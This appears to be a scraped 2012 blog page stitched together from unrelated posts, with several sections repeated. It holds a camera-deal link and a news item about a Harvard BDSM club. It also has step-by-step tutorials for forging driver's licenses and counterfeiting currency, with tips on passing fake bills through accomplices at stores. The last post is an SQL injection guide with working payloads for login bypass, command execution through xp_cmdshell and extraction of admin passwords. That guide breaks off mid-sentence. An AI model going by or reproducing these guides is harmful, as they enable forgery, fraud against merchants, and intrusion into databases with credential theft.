Hopefully its still there by the time you read this. Good Luck
Saturday, December 15, 2012
Canon 5D Mark III Sale
I came across a website called Webstore.com and got a good deal on a Canon 5D Mark III. I love this camera, although id rather have a RED Camera, but for the price I got it for I couldn't beat it. Here's a link of another deal I stumbled across for a brand new Mark III http://webstore.com/id= 23912007
Hopefully its still there by the time you read this. Good Luck
Hopefully its still there by the time you read this. Good Luck
Friday, November 30, 2012
Sex Club At Harvard Approved.. What???
Harvard University, home to the best and the brightest, now has an official club for the kinkiest.
Harvard College Munch for the BDSM set will be approved as a student organization on Friday, the Crimson reported.
The expected go-ahead by the Committee on Student Life will entitle Munch to meet for lunch or dinner on campus, promote gatherings on school grounds and apply for grants from the school's Drug and Alcohol Peer Advisors organization, the paper said.
Once an informal gathering for like-minded individuals to discuss their proclivities in the bedroom without fear of being judged, Munch now has "institutional support" to provide reassurance for its members, its anonymous founder "Michael" said in the story.
One member told the Observer that she had been hit with a riding crop, a belt and canes in a private Munch get-together. "Floggers are my favorite," she said.
There is historical precedent. The Iowa State University student government funded a bondage club in 2003, calling it a triumph for diversity, one publication reported.
Now S&M clubs are increasingly popular at elite institutions as "50 Shades Of Grey" climbed the bestseller list, the Observer said. Columbia, Tufts, MIT and Yale have them, though the story did not say whether they were officially recognized. Assault cases from within some groups have sprung up as well, the paper said.
But one Munch member told the Crimson that the club could provide a haven for those who engage in BDSM (bondage, discipline, sadism and masochism) after they have been scarred by sexual abuse or other trauma.
Harvard spokesperson Jeff Neal told The Huffington Post that the college does not endorse the views or activities of any independent student organization.
How To Make Fake ID's
Warning:
Basics:
There are several ways to make your very own Fake ID. In this tutorial I will show you how to publish a professional one. This way may cost you some money, but if you want the confidence to walk into your local liquor store and buy a bottle of Southern Comfort, this is the solution to all your problems.
Supplies:
• Computer with Editing software (Adobe Photoshop)
• Inkjet Printer
• Special” Teslin” Paper( almost identical to standard PVC plastic)
• Home Laminator
• Hologram (optional)
• Driver’s License Template
Step One- Making and Editing your Template:
In order to make this happen you’re going to obtain a Template online, which is basically a blank Driver’s License with no information on it. One of my favorite templates is the Florida State Driver’s License. This template is very simple to edit and all you have to do is enter your new information. I have included the template available for download here.
*In order to edit the Template, you will need a program called Adobe Photoshop; you can download a Trial version at their website here.
Here are some tips for editing your template:
• The Font used in this template is called Franklin Gothic Medium. (You should already have this loaded on your computer, if not it can be downloaded from online for free.
• You will also need a high quality photo, in which you can imbed into the template. The photo must have you standing in front of a light blue or gray background with the top of your shoulders included.
• I also found a very useful website that generates Driver’s License numbers which carry information about your License. The Website can be found here.
• Next, you will want to make a back part of the ID. This is fairly simple to make. With a white background you can add a black bar that goes across the top and type some information regarding the DMV and restrictions.
• When you’re done entering all the information will need to add a signature right below the picture. For this you can download a unique hand written font online in cursive format.
Step Two- Paper and Printing:
Because of forgery, the Government has made it impossible for you to use you home inkjet printer to print on the Standard PVC plastic unless you want to go online and purchase a special thousand dollar printer. This is why we use paper called Teslin. It bends, looks, and feels almost identical to PVC, and it can be bought for cheap here.
Now that you have your paper and Template ready, you should print on a regular piece of paper first to assure it is the correct size, and if you need to modify. If everything has gone dandy you can begin to print on a sheet of Teslin and continue to the next step.
Step Three-Lamination:
After your template is printed out, it needs to be laminated. Like everything else the type of lamination varies depending on the material you are laminating, a good thickness to work with is 10 mil. To laminate Teslin you need butterfly pouches for Teslin. Laminating pouches also come in different varieties. You can get ones that are glossy or that are matte. Also they come with hi or low co magnetic strips. Lamination can be found here. A decent laminator is a must for the id specialist. My favorite is the Docuseal 40 which is available for 40 dollars.
- It is illegal to forge an ID card in most jurisdictions
- It is illegal to hold yourself out as an authority that you are not in many jurisdictions.
- It is illegal in most jurisdictions to present a fake ID card for the purposes of circumventing the law. This is a novelty item for the purposes of acting or gifts only and should not be used for legal activities.
Basics:
There are several ways to make your very own Fake ID. In this tutorial I will show you how to publish a professional one. This way may cost you some money, but if you want the confidence to walk into your local liquor store and buy a bottle of Southern Comfort, this is the solution to all your problems.
Supplies:
• Computer with Editing software (Adobe Photoshop)
• Inkjet Printer
• Special” Teslin” Paper( almost identical to standard PVC plastic)
• Home Laminator
• Hologram (optional)
• Driver’s License Template
Step One- Making and Editing your Template:
In order to make this happen you’re going to obtain a Template online, which is basically a blank Driver’s License with no information on it. One of my favorite templates is the Florida State Driver’s License. This template is very simple to edit and all you have to do is enter your new information. I have included the template available for download here.
*In order to edit the Template, you will need a program called Adobe Photoshop; you can download a Trial version at their website here.
Here are some tips for editing your template:
• The Font used in this template is called Franklin Gothic Medium. (You should already have this loaded on your computer, if not it can be downloaded from online for free.
• You will also need a high quality photo, in which you can imbed into the template. The photo must have you standing in front of a light blue or gray background with the top of your shoulders included.
• I also found a very useful website that generates Driver’s License numbers which carry information about your License. The Website can be found here.
• Next, you will want to make a back part of the ID. This is fairly simple to make. With a white background you can add a black bar that goes across the top and type some information regarding the DMV and restrictions.
• When you’re done entering all the information will need to add a signature right below the picture. For this you can download a unique hand written font online in cursive format.
Step Two- Paper and Printing:
Because of forgery, the Government has made it impossible for you to use you home inkjet printer to print on the Standard PVC plastic unless you want to go online and purchase a special thousand dollar printer. This is why we use paper called Teslin. It bends, looks, and feels almost identical to PVC, and it can be bought for cheap here.
Now that you have your paper and Template ready, you should print on a regular piece of paper first to assure it is the correct size, and if you need to modify. If everything has gone dandy you can begin to print on a sheet of Teslin and continue to the next step.
Step Three-Lamination:
After your template is printed out, it needs to be laminated. Like everything else the type of lamination varies depending on the material you are laminating, a good thickness to work with is 10 mil. To laminate Teslin you need butterfly pouches for Teslin. Laminating pouches also come in different varieties. You can get ones that are glossy or that are matte. Also they come with hi or low co magnetic strips. Lamination can be found here. A decent laminator is a must for the id specialist. My favorite is the Docuseal 40 which is available for 40 dollars.
How To Make Counterfeit Money / Fake Money
This is illegal and is for informational purposes only.
I've read counterfeit tutorials and check blanking tutorials on here but none of them had the method I'm going to share with you. I've been doing this for about 2 years now and it has never failed me!
Here is my complete freebase method of making counterfeit method and blanking checks. I hope you all enjoy it and find it useful!
2)BE CAREFUL SPENDING $50 OR $100 IF YOUR ARE YOUNG. 99% OF THE TIME THEY WILL CHECK THE MONEY
3)DON'T SPEND THE MONEY ANYWHERE YOU KNOW THEY CHECK IT. THEY PAPER IS REAL SO THEY CAN USE A PEN TO CHECK IT BUT IF THEY USE A SCANNER YOUR SCREWED. MONEY IS MADE FROM METAL AND FABRIC AND THE SCANNERS CHECK FOR THE METAL. THE CLEANING PROCESS REMOVES THE METAL!
4)IF YOU EVER GET CAUGHT ITS BEST THAT YOU DON'T HAVE ALOT OF COUNTERFEIT MONEY ON YOU. THE MORE YOU HAVE, THE MORE JAIL TIME YOU WILL RECEIVE.
5)DON'T GO MAKING $1000'S OF COUNTERFEIT MONEY. COUNTERFEIT MONEY CIRCULATION IS SOMETHING I DON'T BELIEVE IN. PEOPLE GET IN TROUBLE EVEN WHEN THEY DON'T DO ANYTHING. THAT'S JUST RUDE.
6)DON'T SMELL THE "REACTION BATH" THE CHEMICALS IN THAT ARE EXTREMELY BAD FOR YOU. YOU MIGHT AS WELL BE SNIFFING AMMONIA IF YOU PLAN ON SMELLING THE "REACTION BATH."
7)SAFETY IS YOUR TOP CONCERN. BE CAREFUL AND TAKE THE TIME TO MAKE SURE YOUR PREPARED.
8)ITS NOT A RACE. TAKE YOUR TIME!
9)BE SMART.
10)NEW $1 BILLS WILL NOT WORK. THEY (THE FBEP -THE FEDERAL BUREAU OF PRINTING AND ENGRAVING) NOW GIVE MONEY "CHEMICAL TESTS." IF THE MONEY YOU HAVE WILL NOT CLEAN, THEY MONEY IS NEW AND YOUR OUT OF MUCH. I WILL SHOW YOU WHAT I MEAN IN THE VIDEO. THERE IS A WAY TO CLEAN THE MONEY BUT IT TAKES ABOUT 2 HOURS ALONE TO PREPARE IT FOR CLEANING. IF ANYONE WANTS ME TO INCLUDE THIS INTO THE TUTORIAL I WILL BUT I WILL NOT BE INCLUDING IT IN THE VIDEO.
Counterfeit Tutorial:
Materials Required:
1)Kleenex Tissues or Baby Wipes
2)Bowl or Dish pan
3)Pure CH3COCH3
4)NaClO
5)*Optional* H202
6)Hard, Flat Surface
7)$1 bills (the more you have the more money you make)
8)Large Envelopes
9)Heavy Book (dictionary/encyclopedia)
10)Double Sided Tape
11)Printer Paper
12)Scissors
13)1968 or earlier Currency images (front and back) (use whatever amount you want. I suggest a $5, $10, or $20)
14)Iron & Ironing board
15)Scanner/Printer
16)Patience
17)Measuring Cup (ml)
18)Gloves
19)Face Protection
20)Pencil
Process 1: Preparing your money
1)Take all your $1 bills and iron them flat. The $1 bill MUST be in perfect condition!!! Tares or any imperfections can ruin the final product!
2)Measure out 500ml of pure CH3COCH3 and add in to the bowl
3)Measure out 500ml of NaClO and add it to the bowl
4)*Optional* Measure out 500ml of H2O2 and add it the the bowl
***Notice a reaction taking place? It should get hot and start bubbling. This is your "Reaction Bath." This chemical solution will dissolve the ink of the money. Adding the H2O2 is optional because it really isn't really necessary. But using it will produce a better, more realistic looking product.***
5)Put on your Gloves (these gloves should be chemical and electric resistant. Rubber gloves are best for this)
6)Put on your mouth/nose protecting mask. breathing in the chemical smell from the reaction bath can be toxic. This isn't necessary but safety should ALWAYS be your top priority when working with chemicals.
Process 2: "Cleaning" your money
1)Add the $1 bill in the reaction bath and let is sit for 10 minutes. This will allow the reaction to finish and make the ink removal ALOT easier (if you used the H2O2. If you didn't, it will be a little harder to do)
2)Place the $1 bill on a hard surface
3)Take your Kleenex or your DRIED baby wipe and begin softly but firmly rubbing the ink off the front of the $1 bill in a circular motion.
***THIS IS NOT A RACE!!!!! BE SLOW AND TAKE YOUR TIME. THE MORE TIME YOU TAKE TO CARE ABOUT THE PRODUCT, THE BETTER ITS FINAL RESULT WILL BE!***
***You will notice that the front if the bill will become black and smudgy (if you didn't use the H2O2) But if you did, the ink should come off easily.***
4)You WON'T get this all off with just 1 soak! It will take 3-4 Soaks to completely clean the $1 bill. Every additional soak is just 1-2 minutes
5)Repeat this process until the $1 becomes complete white/gray/pearl
6)Take the $1 bill and run it under HOT water (don't flood the thing. A nice slow stream works) be sure to cover all the $1 bill. You don't want any left over chemicals still on the $1 bill
7)Now do the same but in COLD water
***If the money rips/tares EVEN A LITTLE, THE PROCESS HAS FAILED AND ITS UNUSABLE. YOU WILL HAVE TO START OVER***
8)Place the $1 bill in a large envelope and place a heavy book on top of it
9)Let this sit for an hour and a half (90 minutes) so it can solidify and feel normal again.
***look at the $1 bill. The front should be white but the back should still be normal. This is what you want! The money should have the same texture as if nothing was done to it. There will however be little collections of balled up ink/little bits of paper. This is normal!***
10)Carefully re-iron the $1 bill to remove the little blots of leftover ink/balled up paper. They may not completely go away but they will be suppressed so its OK!
17)Now just repeat steps 1-10 expect with the back of the bill and you will have 1 completely blank $1 bill!!!!! Do this for however much money you want to print.
Process 3: Printing
1)Find the 1968 currency (front and back) for the amount of money you want. The 1968 currency doesn't have any security features and are still in circulation to this very day. They are rare to get but they exist.
2)Take your index card and scissors and cut out an EXACT replica of the $1 bill. This will be your "Test Print" to make sure you are doing everything OK.
3)Tape the back of the index card down with the double sided tape (tape th edges to you don't effect the entire replica bill or remove any paper)
4)Trace and outline of the location with a pencil (lightly)
5)Scan your "test print"
6)Use a photo editing tool such as PhotoShop and create a new image
7)Make it as big as the "test print' and add the front of the currency to where the index card is.
8)Now print it in a high quality!
9)Wait an hour and let the ink dry
10)Repeat steps 2-9 except printing the back
11)After the ink COMPLETELY DRIES, iron it one last time!
Congratulations! You just made counterfeit money!!!!!
Here are some suggestions:
1)Don't make anything higher then a $50 if your underage. People will check it out
2)Don't spend the fake money at a place where you know they check the money. It will pass the "paper test" because its still the same real paper just reprinted.
3)If you have a buddy that works at a store, I suggest making a $100, then getting change for it (giving him his share of the cut) Then you will have a REAL $100 and your friend can spread the fake money on the next person who pays in a high amount (receiving $100 in change) or his/her boss can get the fake money. Counterfeit circulation . my sister works at an amusement park and all day ride passes are $50 each. I just blow the fake $100 to her and get change instead of tickets. Then i give her $20 from the cut. Our way of stealing money.
4)Just be smart about what you make. Don't rush.
NaClO = Bleach
H2O2 = Hydrogen Peroxide (3% works best)
Or You Can Try It This Way
Materials:
1)"Goof off" graffiti remover. (I found this to work better than bleach and a lot less fumes.)
2)$1 or $5 bills.($5 and up bills have the watermark and are safer to use, but cost more if you mess up)
3)Toothbrush or paintbrush
4)Printer
5)Money picture off Google
6)Bleach
Now the procedure
1) First you are going to need to remove the old ink off the money. Put some goof off on the money and scrub with your brush. Don’t get it too wet because it could rip and you have to start over. Set money outside to dry.
2) After it’s dry you can still see a little bit of the ink, this is where your bleach comes in. Soak the money in bleach and it will come out clean. You can also use bleach to begin with, but goof off removes the ink quicker.3) Now after your gathered your pictures of money off Google, resize it to 6.14"x2.61" (the size of all bills.) Print a test copy.
4) After you print a test copy, tape your blank money on top of the paper so it lines up perfectly. (If you click "center on paper" when you print it makes it easier to tape)
Can you spot the fake?
I've read counterfeit tutorials and check blanking tutorials on here but none of them had the method I'm going to share with you. I've been doing this for about 2 years now and it has never failed me!
Here is my complete freebase method of making counterfeit method and blanking checks. I hope you all enjoy it and find it useful!
WARNINGS:
1)DO NOT START WITH THE BACK OF THE $1 BILL. THE BACK IS HARDER TO CLEAN AND IT WILL RESULT IN A RIP/TARE IF YOU START WITH IT.2)BE CAREFUL SPENDING $50 OR $100 IF YOUR ARE YOUNG. 99% OF THE TIME THEY WILL CHECK THE MONEY
3)DON'T SPEND THE MONEY ANYWHERE YOU KNOW THEY CHECK IT. THEY PAPER IS REAL SO THEY CAN USE A PEN TO CHECK IT BUT IF THEY USE A SCANNER YOUR SCREWED. MONEY IS MADE FROM METAL AND FABRIC AND THE SCANNERS CHECK FOR THE METAL. THE CLEANING PROCESS REMOVES THE METAL!
4)IF YOU EVER GET CAUGHT ITS BEST THAT YOU DON'T HAVE ALOT OF COUNTERFEIT MONEY ON YOU. THE MORE YOU HAVE, THE MORE JAIL TIME YOU WILL RECEIVE.
5)DON'T GO MAKING $1000'S OF COUNTERFEIT MONEY. COUNTERFEIT MONEY CIRCULATION IS SOMETHING I DON'T BELIEVE IN. PEOPLE GET IN TROUBLE EVEN WHEN THEY DON'T DO ANYTHING. THAT'S JUST RUDE.
6)DON'T SMELL THE "REACTION BATH" THE CHEMICALS IN THAT ARE EXTREMELY BAD FOR YOU. YOU MIGHT AS WELL BE SNIFFING AMMONIA IF YOU PLAN ON SMELLING THE "REACTION BATH."
7)SAFETY IS YOUR TOP CONCERN. BE CAREFUL AND TAKE THE TIME TO MAKE SURE YOUR PREPARED.
8)ITS NOT A RACE. TAKE YOUR TIME!
9)BE SMART.
10)NEW $1 BILLS WILL NOT WORK. THEY (THE FBEP -THE FEDERAL BUREAU OF PRINTING AND ENGRAVING) NOW GIVE MONEY "CHEMICAL TESTS." IF THE MONEY YOU HAVE WILL NOT CLEAN, THEY MONEY IS NEW AND YOUR OUT OF MUCH. I WILL SHOW YOU WHAT I MEAN IN THE VIDEO. THERE IS A WAY TO CLEAN THE MONEY BUT IT TAKES ABOUT 2 HOURS ALONE TO PREPARE IT FOR CLEANING. IF ANYONE WANTS ME TO INCLUDE THIS INTO THE TUTORIAL I WILL BUT I WILL NOT BE INCLUDING IT IN THE VIDEO.
Counterfeit Tutorial:
Materials Required:
1)Kleenex Tissues or Baby Wipes
2)Bowl or Dish pan
3)Pure CH3COCH3
4)NaClO
5)*Optional* H202
6)Hard, Flat Surface
7)$1 bills (the more you have the more money you make)
8)Large Envelopes
9)Heavy Book (dictionary/encyclopedia)
10)Double Sided Tape
11)Printer Paper
12)Scissors
13)1968 or earlier Currency images (front and back) (use whatever amount you want. I suggest a $5, $10, or $20)
14)Iron & Ironing board
15)Scanner/Printer
16)Patience
17)Measuring Cup (ml)
18)Gloves
19)Face Protection
20)Pencil
Process 1: Preparing your money
1)Take all your $1 bills and iron them flat. The $1 bill MUST be in perfect condition!!! Tares or any imperfections can ruin the final product!
2)Measure out 500ml of pure CH3COCH3 and add in to the bowl
3)Measure out 500ml of NaClO and add it to the bowl
4)*Optional* Measure out 500ml of H2O2 and add it the the bowl
***Notice a reaction taking place? It should get hot and start bubbling. This is your "Reaction Bath." This chemical solution will dissolve the ink of the money. Adding the H2O2 is optional because it really isn't really necessary. But using it will produce a better, more realistic looking product.***
5)Put on your Gloves (these gloves should be chemical and electric resistant. Rubber gloves are best for this)
6)Put on your mouth/nose protecting mask. breathing in the chemical smell from the reaction bath can be toxic. This isn't necessary but safety should ALWAYS be your top priority when working with chemicals.
Process 2: "Cleaning" your money
1)Add the $1 bill in the reaction bath and let is sit for 10 minutes. This will allow the reaction to finish and make the ink removal ALOT easier (if you used the H2O2. If you didn't, it will be a little harder to do)
2)Place the $1 bill on a hard surface
3)Take your Kleenex or your DRIED baby wipe and begin softly but firmly rubbing the ink off the front of the $1 bill in a circular motion.
***THIS IS NOT A RACE!!!!! BE SLOW AND TAKE YOUR TIME. THE MORE TIME YOU TAKE TO CARE ABOUT THE PRODUCT, THE BETTER ITS FINAL RESULT WILL BE!***
***You will notice that the front if the bill will become black and smudgy (if you didn't use the H2O2) But if you did, the ink should come off easily.***
4)You WON'T get this all off with just 1 soak! It will take 3-4 Soaks to completely clean the $1 bill. Every additional soak is just 1-2 minutes
5)Repeat this process until the $1 becomes complete white/gray/pearl
6)Take the $1 bill and run it under HOT water (don't flood the thing. A nice slow stream works) be sure to cover all the $1 bill. You don't want any left over chemicals still on the $1 bill
7)Now do the same but in COLD water
***If the money rips/tares EVEN A LITTLE, THE PROCESS HAS FAILED AND ITS UNUSABLE. YOU WILL HAVE TO START OVER***
8)Place the $1 bill in a large envelope and place a heavy book on top of it
9)Let this sit for an hour and a half (90 minutes) so it can solidify and feel normal again.
***look at the $1 bill. The front should be white but the back should still be normal. This is what you want! The money should have the same texture as if nothing was done to it. There will however be little collections of balled up ink/little bits of paper. This is normal!***
10)Carefully re-iron the $1 bill to remove the little blots of leftover ink/balled up paper. They may not completely go away but they will be suppressed so its OK!
17)Now just repeat steps 1-10 expect with the back of the bill and you will have 1 completely blank $1 bill!!!!! Do this for however much money you want to print.
Process 3: Printing
1)Find the 1968 currency (front and back) for the amount of money you want. The 1968 currency doesn't have any security features and are still in circulation to this very day. They are rare to get but they exist.
2)Take your index card and scissors and cut out an EXACT replica of the $1 bill. This will be your "Test Print" to make sure you are doing everything OK.
3)Tape the back of the index card down with the double sided tape (tape th edges to you don't effect the entire replica bill or remove any paper)
4)Trace and outline of the location with a pencil (lightly)
5)Scan your "test print"
6)Use a photo editing tool such as PhotoShop and create a new image
7)Make it as big as the "test print' and add the front of the currency to where the index card is.
8)Now print it in a high quality!
9)Wait an hour and let the ink dry
10)Repeat steps 2-9 except printing the back
11)After the ink COMPLETELY DRIES, iron it one last time!
Congratulations! You just made counterfeit money!!!!!
Here are some suggestions:
1)Don't make anything higher then a $50 if your underage. People will check it out
2)Don't spend the fake money at a place where you know they check the money. It will pass the "paper test" because its still the same real paper just reprinted.
3)If you have a buddy that works at a store, I suggest making a $100, then getting change for it (giving him his share of the cut) Then you will have a REAL $100 and your friend can spread the fake money on the next person who pays in a high amount (receiving $100 in change) or his/her boss can get the fake money. Counterfeit circulation . my sister works at an amusement park and all day ride passes are $50 each. I just blow the fake $100 to her and get change instead of tickets. Then i give her $20 from the cut. Our way of stealing money.
4)Just be smart about what you make. Don't rush.
:::::INFORMATION:::::
CH3COCH3 = AcetoneNaClO = Bleach
H2O2 = Hydrogen Peroxide (3% works best)
Or You Can Try It This Way
Materials:
1)"Goof off" graffiti remover. (I found this to work better than bleach and a lot less fumes.)
2)$1 or $5 bills.($5 and up bills have the watermark and are safer to use, but cost more if you mess up)
3)Toothbrush or paintbrush
4)Printer
5)Money picture off Google
6)Bleach
Now the procedure
1) First you are going to need to remove the old ink off the money. Put some goof off on the money and scrub with your brush. Don’t get it too wet because it could rip and you have to start over. Set money outside to dry.
2) After it’s dry you can still see a little bit of the ink, this is where your bleach comes in. Soak the money in bleach and it will come out clean. You can also use bleach to begin with, but goof off removes the ink quicker.3) Now after your gathered your pictures of money off Google, resize it to 6.14"x2.61" (the size of all bills.) Print a test copy.
4) After you print a test copy, tape your blank money on top of the paper so it lines up perfectly. (If you click "center on paper" when you print it makes it easier to tape)
Can you spot the fake?
Sql Injection Explaned (Hacking)
1.0 Introduction
When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.
This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.
1.1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
1.2 What do you need?
Any web browser.
2.0 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise).
2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:
http://duck/index.asp?id=10
3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get login without any login name or password.
3.1 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
4.0 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder "share" sharing for Everyone.
6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We also can search for data using LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".
6.1 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
6.2 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now login as "neo" with his password "m4trix".
6.3 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.
To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now, you can even login as 'trinity' with the password '31173'.
7.0 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
